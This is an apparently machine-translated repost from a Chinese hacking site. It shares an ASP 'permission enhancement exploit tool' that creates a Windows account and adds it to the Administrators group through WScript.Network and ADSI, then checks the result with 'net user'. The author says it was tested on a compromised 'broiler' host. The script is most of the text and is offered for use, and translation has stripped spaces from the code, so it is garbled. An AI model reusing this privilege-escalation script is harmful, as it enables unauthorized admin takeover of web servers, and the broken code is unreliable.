Added Super User's .asp code [Blue Screen Original, Kevin Improvement, Ms Unpublished Vulnerability

Added Super User's .asp code [Original of Blue Screen, Kevin Improvement, Ms Unpublished Vulnerability]

Author: Blue Screen, Kevin's article source: Freezing Point Extreme

Actually, Kevin and I tested it on my broiler last week, and Hippo Epic. The result was that users of the Administrators group were successfully added under user permissions (although I can't believe my eyes).

Last time Kevin didn't say anything, I didn't dare to post it... Now I saw him posting it on his blog, so I transferred it (it was a little better than when I tested it last time, and I added a form). Now I'm lucky for everyone ```

Anyway, the code is correct, but it rarely succeeds, it depends on luck. . Haha, next step I want to integrate him into the ocean. hey-hey.

The code copy is as follows:

<head>.network object script permission enhancement exploit tool</head>

<formaction="useradd.asp"method=post>

User:<inputname="username"type="text"value="kevin1986"><br>

Password:<inputname="passwd"type="password"><br>

<inputtype="submit"Value="Add">

</form>

<%@codepage=936

onerrorresumenext

ifrequest.servervariables("REMOTE_ADDR")<>"127.0.0.1"then

response.write"iP!sn0TRiGHt"

else

ifrequest("username")<>""then

username=request("username")

passwd=request("passwd")

Response.Expires=0

Session.TimeOut=50

Server.ScriptTimeout=3000

setlp=Server.createObject("WSCRIPT.NETWORK")

oz="WinNT://"&lp.ComputerName

Setob=GetObject(oz)

Setoe=GetObject(oz&"/Administrators,group")

Setod=ob.create("user",username)

od.SetPasswordpasswd

od.SetInfo

oe.Addoz&"/"&username

iferrthen

response.write "Hey~~You should not buy 6+1 today... It's better to save 2 yuan to buy a bottle of Coke..."

else

ifinstr(server.createobject("Wscript.shell").exec("cmd.exe/cnetuser"&username.stdout.readall),"Last login")>0then

response.write "Although there is no error, it seems that it has not been successfully established. You must be very depressed."

else

Response.write "OMG!"&username&"Account actually became! This is an unknown loophole. 5,000,000RMB is yours."

endif

endif

else

response.write "Please enter the username"

endif

endif

%>

Articles that may be of interest to you:

Reject the extra-star virtual host management system, super user freehostrunat remote desktop, improve the security system, various hidden super user addition methods, retrieve the super user password of Redhat Linux 7.2, method of adding super user to ordinary users.